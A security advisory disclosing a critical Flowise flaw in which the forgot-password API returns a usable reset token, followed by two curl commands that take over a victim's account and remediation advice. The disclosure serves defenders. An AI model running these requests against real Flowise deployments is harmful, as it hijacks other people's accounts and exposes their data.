GHSA-wgpv-6j63-x5ph

### Summary

The `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**.

This vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API.

**CVSS v3.1 Base Score:** **9.8 (Critical)**
**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`

---

### Details

* The endpoint `/api/v1/account/forgot-password` accepts an email address as input.
* Instead of only sending a reset email, the API **responds directly with sensitive user details**, including:

* User ID, name, email, hashed credential, status, timestamps.
* **A valid `tempToken` and its expiry**, which is intended for password reset.
* This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction.
* Exploitation requires only the victim’s email address, which is often guessable or discoverable.
* Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email.

---

### PoC

1. **Request a reset token for the victim**

```bash
curl -i -X POST https://<target>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
```

**Response (201 Created):**

```json
{
"user": {
"id": "<redacted-uuid>",
"name": "<redacted>",
"email": "<[email protected]>",
"credential": "<redacted-hash>",
"tempToken": "<redacted-tempToken>",
"tokenExpiry": "2025-08-19T13:00:33.834Z",
"status": "active"
}
}
```

2. **Use the exposed `tempToken` to reset the password**

```bash
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<redacted-tempToken>",
"password":"NewSecurePassword123!"
}
}'
```

**Expected Result:** `200 OK`
The victim’s account password is reset, allowing full login.

---

### Impact

* **Type:** Authentication bypass / Insecure direct object exposure.
* **Impact:**

* Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
* Applies to **both Flowise Cloud and locally hosted/self-managed deployments**.
* Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
* High likelihood of exploitation since no prior access or user interaction is required.

---

### Recommended Remediation

* **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
* Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration.
* Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
* Apply the same fixes to **both cloud and self-hosted/local deployments**.
* Log and monitor password reset requests for suspicious activity.
* Consider multi-factor verification for sensitive accounts.

Credit

---

⚠️ This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**.

---